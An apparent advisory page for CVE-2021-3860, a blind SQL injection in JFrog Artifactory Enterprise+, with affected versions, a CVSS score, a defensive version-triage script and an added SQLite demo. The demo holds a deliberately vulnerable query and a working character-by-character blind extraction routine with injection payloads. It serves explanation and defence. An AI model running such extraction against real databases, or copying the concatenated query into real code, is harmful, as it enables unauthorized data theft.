Blind SQL Injection Vulnerability in JFrog Artifactory for Enterprise+ Deployments
CVE-2021-3860

8.8 HIGH

Key Information:

Vendor:
JFrog

CVE Published:
20 December 2021

What is CVE-2021-3860?

JFrog Artifactory versions prior to 7.25.4 on the 7.x line (and prior to 6.23.30 on the 6.x line), in Enterprise+ deployments only, are vulnerable to Blind SQL Injection. A low-privileged authenticated user can exploit incomplete validation of input that is incorporated into an SQL query. Because the injection is blind, the attacker does not receive query output directly, but can infer database contents from differences in the application's responses (true/false results, errors, or timing), which can lead to unauthorized data access. Input validation on its own is not a sufficient defence against this class of flaw: user-controlled values should be passed to the database as query parameters so that they can never change the structure of the query.
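To make the "blind" part of the description concrete, here is an added, self-contained illustration of the vulnerability class using an in-memory SQLite table. It is not Artifactory's code, schema or injection point, none of which this advisory discloses; the table, rows, column names and the blocklist-style filter are constructed for the demo. It shows a lookup that only ever answers true or false, yet still leaks a secret column one character at a time when the query is built by concatenation behind an incomplete validation check, and shows that the same probes recover nothing once the query is parameterised.

```python
import sqlite3

# Constructed demo data; not Artifactory's schema.
_DEMO_ROWS = [
    ("alice", "s3cr3t-admin-token"),
    ("bob", "reader-only"),
]


def _make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, api_key TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", _DEMO_ROWS)
    return conn


def user_exists_vulnerable(conn: sqlite3.Connection, name: str) -> bool:
    """Incomplete validation: a token blocklist rejects one obvious pattern but
    the value is still concatenated into the query, so other payloads pass."""
    if "'--" in name:
        raise ValueError("rejected by filter")
    sql = f"SELECT 1 FROM users WHERE name = '{name}'"
    return conn.execute(sql).fetchone() is not None


def user_exists_fixed(conn: sqlite3.Connection, name: str) -> bool:
    """Parameterised query: the input is data only and cannot alter the SQL."""
    row = conn.execute("SELECT 1 FROM users WHERE name = ?", (name,)).fetchone()
    return row is not None


def blind_extract(oracle, target_user: str, column: str, max_len: int = 32) -> str:
    """Boolean-based blind inference. The oracle returns only True/False, but the
    injected AND-clause makes that answer depend on one character of the target
    column, so the attacker recovers the value by iterating over positions and
    candidate printable characters."""
    recovered = ""
    for pos in range(1, max_len + 1):
        found = False
        for code in range(32, 127):
            # Avoids the blocklisted "'--" pattern; closes the string instead.
            payload = (
                f"{target_user}' AND unicode(substr({column},{pos},1)) = {code} AND '1'='1"
            )
            if oracle(payload):
                recovered += chr(code)
                found = True
                break
        if not found:
            # substr() past the end yields '' and unicode('') is NULL: end of value.
            break
    return recovered


def demo() -> tuple:
    """Run the same probes against the vulnerable and the fixed lookup."""
    conn = _make_db()
    leaked = blind_extract(lambda p: user_exists_vulnerable(conn, p), "alice", "api_key")
    safe = blind_extract(lambda p: user_exists_fixed(conn, p), "alice", "api_key")
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable lookup leaked:", repr(leaked))
    print("parameterised lookup leaked:", repr(safe))
```

Each probe here costs one request, so a real blind extraction is noisy: a rate of many failed lookups for the same low-privileged account, with long names containing quotes and SQL keywords, is the signal a detection rule would key on.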

Affected Version(s)

JFrog Artifactory with Enterprise+ license, 7.x line: versions before 7.25.4

JFrog Artifactory with Enterprise+ license, 6.x line: versions before 6.23.30
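The two fixed versions above belong to separate release lines, so a plain "less than 7.25.4" comparison would wrongly flag every patched 6.x instance. The following added triage helper (not JFrog's code) encodes the ranges from this advisory: below 6.23.30 is affected, 6.23.30 up to but excluding 7.0.0 is patched, 7.0.0 up to but excluding 7.25.4 is affected, and 7.25.4 and later is patched, with the Enterprise+ condition applied on top. The version string can be read from the `version` field of Artifactory's `GET /artifactory/api/system/version` endpoint; how you determine the license edition is left to the caller, and the inventory entries in `demo_inventory` are constructed sample data.

```python
import re
from typing import List, Tuple

FIXED_6X = (6, 23, 30)   # from this advisory
FIXED_7X = (7, 25, 4)    # from this advisory


def parse_version(version: str) -> Tuple[int, int, int]:
    """Parse 'major.minor.patch' (trailing suffixes such as build ids are ignored)."""
    m = re.match(r"^\s*(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised Artifactory version: {version!r}")
    return tuple(int(x) for x in m.groups())  # type: ignore[return-value]


def is_affected(version: str, enterprise_plus: bool) -> bool:
    """True if this instance falls inside CVE-2021-3860's affected ranges."""
    if not enterprise_plus:
        return False  # advisory scopes the flaw to Enterprise+ deployments
    v = parse_version(version)
    if v < FIXED_6X:
        return True   # any 6.x (or older) build before the 6.x fix
    if v < (7, 0, 0):
        return False  # patched 6.x line
    if v < FIXED_7X:
        return True   # 7.x build before the 7.x fix
    return False      # 7.25.4 or later


def triage(inventory: List[Tuple[str, str, bool]]) -> List[str]:
    """Return the hostnames that still need the fix.
    inventory entries are (hostname, version, enterprise_plus)."""
    return [host for host, ver, eplus in inventory if is_affected(ver, eplus)]


# Constructed sample inventory (hypothetical hosts), not real systems.
demo_inventory = [
    ("art-prod-1", "7.25.3", True),
    ("art-prod-2", "7.25.4", True),
    ("art-legacy", "6.23.29", True),
    ("art-legacy-patched", "6.23.30", True),
    ("art-pro-edition", "7.10.0", False),
]

if __name__ == "__main__":
    for host in triage(demo_inventory):
        print("needs upgrade:", host)
```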

CVSS V3.1

Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Score: 8.8
Severity: HIGH
Confidentiality: High
Integrity: High
Availability: High
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged

Timeline

  • Vulnerability reserved

  • Vulnerability published: 20 December 2021